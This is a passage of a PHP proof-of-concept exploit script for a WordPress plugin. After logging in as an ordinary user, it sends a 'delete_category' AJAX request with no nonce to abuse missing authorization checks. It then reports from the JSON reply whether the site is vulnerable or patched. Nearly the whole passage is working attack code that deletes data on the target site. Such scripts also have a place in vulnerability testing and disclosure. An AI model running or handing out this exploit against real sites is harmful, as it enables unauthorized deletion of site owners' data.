    fwrite(STDERR, "[-] Login request failed: " . curl_error($ch) . "\n");
    exit(1);
}
// A failed login re-renders wp-login.php with the #login_error box; a successful
// one redirects to $target_url, which answers "0" because no action was given.
if (strpos($response, 'login_error') !== false) {
    fwrite(STDERR, "[-] Login failed: check the credentials.\n");
    exit(1);
}
echo "[*] Logged in as {$username}\n";

// Step 2: Exploit missing authorization to delete a category
// The 'delete_category' action does not require a nonce or admin capability in vulnerable versions
$post_data = [
    'action' => 'delete_category', // Vulnerable AJAX action
    'id'     => $category_id,      // ID of the category to delete
    // No 'nonce' parameter is required for exploitation
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);
curl_close($ch);
@unlink($cookie_jar);

// Check response: the handler answers with JSON of the form {"status": ..., "message": ...}
$json = json_decode((string) $response, true);
if (is_array($json) && ($json['status'] ?? '') === 'success') {
    echo "[+] Category deletion successful: target is vulnerable.\n";
} elseif (is_array($json) && ($json['status'] ?? '') === 'error') {
    // Patched builds answer "You do not have permission."; a category that is
    // still referenced by a booking answers "Category is already in use." on
    // both vulnerable and patched builds, so pick an unused category id.
    echo "[-] Handler refused the request (" . ($json['message'] ?? '') . "): site is likely patched.\n";
} else {
    // admin-ajax.php prints "0" when no handler is registered for the action
    echo "[-] Unexpected response, handler may not exist or site is patched differently.\n";
}
echo "Response: " . $response . "\n";
